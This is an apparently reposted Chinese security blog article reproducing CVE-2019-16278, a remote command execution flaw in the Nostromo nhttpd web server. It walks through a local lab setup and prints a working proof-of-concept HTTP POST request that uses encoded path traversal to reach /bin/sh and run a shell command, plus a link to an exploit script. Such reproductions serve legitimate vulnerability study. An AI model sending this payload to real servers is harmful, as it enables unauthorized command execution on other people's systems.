Nostromo Web服务器的远程命令执行(CVE-2019-16278)复现

admin 2021年5月17日08:45:50评论216 views字数 711阅读2分22秒阅读模式

简介


Nostromo web server(nhttpd)是一个开源的web服务器,在Unix系统非常流行。

 

影响版本


nhttpd:version <= 1.9.6


 

环境搭建


这里使用nostromo1.9.6的版本进行搭建

下载地址:

http://www.nazgul.ch/dev/nostromo-1.9.6.tar.gz


进入目录进行环境编译

cd /nostromo-1.9.6makemake install


完成之后可进入/var/nostromo/conf目录中,原本只有mimes和nhttp.conf-dist两个文件。删除后缀'-dist'即可。

Nostromo Web服务器的远程命令执行(CVE-2019-16278)复现

vim nhttpd.conf,更改servername和user(user不可为root)

Nostromo Web服务器的远程命令执行(CVE-2019-16278)复现

logs目录权限为777

Nostromo Web服务器的远程命令执行(CVE-2019-16278)复现

启动服务 nhttpd,也可以查看是否已在8080端口运行。

Nostromo Web服务器的远程命令执行(CVE-2019-16278)复现

访问127.0.0.1:8080即可看到页面

Nostromo Web服务器的远程命令执行(CVE-2019-16278)复现


漏洞复现

 

Poc

POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0
Host: 127.0.0.1:8080
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Content-Length: 25


echo
echo
ifconfig 2>&1

构建post请求并发送

Nostromo Web服务器的远程命令执行(CVE-2019-16278)复现

脚本地址:

https://github.com/jas502n/CVE-2019-16278

Nostromo Web服务器的远程命令执行(CVE-2019-16278)复现


修复建议

 

升级到安全版本


本文始发于微信公众号(锋刃科技):Nostromo Web服务器的远程命令执行(CVE-2019-16278)复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年5月17日08:45:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Nostromo Web服务器的远程命令执行(CVE-2019-16278)复现http://cn-sec.com/archives/260128.html

发表评论

匿名网友 填写信息